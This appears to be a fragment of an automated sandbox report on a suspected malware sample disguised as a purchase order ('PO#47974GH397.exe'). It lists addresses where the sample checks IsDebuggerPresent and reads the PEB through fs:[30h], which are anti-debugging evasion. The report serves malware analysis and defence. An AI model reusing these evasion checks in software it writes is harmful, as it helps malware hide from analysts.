Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 0_2_0086D112 IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, 0_2_0086D112
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 0_2_00861B90 mov eax, dword ptr fs:[00000030h] 0_2_00861B90
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 0_2_0087120F mov eax, dword ptr fs:[00000030h] 0_2_0087120F
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 0_2_00886323 mov eax, dword ptr fs:[00000030h] 0_2_00886323
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 0_2_00886C94 mov eax, dword ptr fs:[00000030h] 0_2_00886C94
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 0_2_00886CCF mov eax, dword ptr fs:[00000030h] 0_2_00886CCF
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 0_2_00886D32 mov eax, dword ptr fs:[00000030h] 0_2_00886D32
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 0_2_0086AF6B mov eax, dword ptr fs:[00000030h] 0_2_0086AF6B
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_0087120F mov eax, dword ptr fs:[00000030h] 10_2_0087120F
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_00861B90 mov eax, dword ptr fs:[00000030h] 10_2_00861B90
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_0086AF6B mov eax, dword ptr fs:[00000030h] 10_2_0086AF6B
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_01264120 mov eax, dword ptr fs:[00000030h] 10_2_01264120
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_01264120 mov ecx, dword ptr fs:[00000030h] 10_2_01264120
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_0127513A mov eax, dword ptr fs:[00000030h] 10_2_0127513A
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_01249100 mov eax, dword ptr fs:[00000030h] 10_2_01249100